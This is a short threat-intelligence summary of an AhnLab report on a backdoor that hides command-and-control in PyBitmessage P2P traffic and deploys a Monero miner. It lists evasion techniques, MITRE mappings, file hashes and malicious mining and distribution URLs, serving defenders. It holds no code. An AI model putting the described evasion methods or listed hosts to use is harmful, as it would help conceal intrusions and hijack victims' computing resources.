AhnLab Security Intelligence Center (ASEC) discovered a novel backdoor malware that uses the PyBitmessage library for encrypted P2P communication alongside a Monero coin miner to conceal attacker activities. This malware complicates detection by antivirus and network security products by hiding malicious traffic within normal Bitmessage network messages. #BackdoorMalware #PyBitmessage #Monero #P2PCommunication #CyberSecurity
Keypoints
- A new backdoor malware uses the PyBitmessage library to communicate over a decentralized P2P network, encrypting messages to evade detection.
- The malware distributes a Monero coin miner that utilizes infected system resources for cryptocurrency mining, generating profit for attackers.
- Malicious PowerShell scripts operate filelessly, saving and executing attacker commands received via the PyBitmessage-based C2 channel.
- The malware downloads the PyBitmessage component from GitHub or a suspicious Russian-language file hosting site, suggesting a likely origin from a Russian-speaking threat actor.
- To evade detection, the malware tampers with legitimate DLL files such as QtGui4.dll by altering their functionality.
- This malware conceals C2 commands within legitimate Bitmessage traffic, making malicious communications difficult to distinguish from benign network activity.
- Recommendations to prevent infection include avoiding cracked software or unknown sources and ensuring security products are up to date.
MITRE Techniques
- [T1071] Application Layer Protocol – The malware uses the Bitmessage protocol over the P2P network for command and control, hiding malicous communication inside messages from legitimate users (‘C2 commands and control messages are hidden within messages from real users in the Bitmessage network’).
- [T1086] PowerShell – Powershell is leveraged to execute backdoor functions and run commands received from the C2 server, operating in a fileless manner (‘message received from the threat actor is saved and executed as a PowerShell script’).
- [T1105] Ingress Tool Transfer – The malware downloads the PyBitmessage executable from GitHub or a personal file hosting site set by attackers (‘it attempts to download the file from the Release page on GitHub… or a URL suspected to be a personal drive’).
- [T1027] Obfuscated Files or Information – The malware uses XOR operations to decrypt encrypted payloads and tampers with QtGui4.dll to remove its normal functionality (‘decrypts it through XOR operations’ and ‘patching a specific offset of this QtGui4.dll file to 0x00’).
Indicators of Compromise
- [MD5 Hashes] Backdoor and miner files – 17909a3f757b4b31ab6cd91b3117ec50, 29d43ebc516dd66f2151da9472959890, and 4 others.
- [URLs] Coin mining and malware distribution servers – http://krb.miner.rocks:4444/, http://krb.sberex.com:3333/, http://pool.karbowanec.com:3333/, http://pool.supportxmr.com:3333/, https://spac1.com/files/view/bitmessage-6-3-2-80507747/
Read more: https://asec.ahnlab.com/en/88109/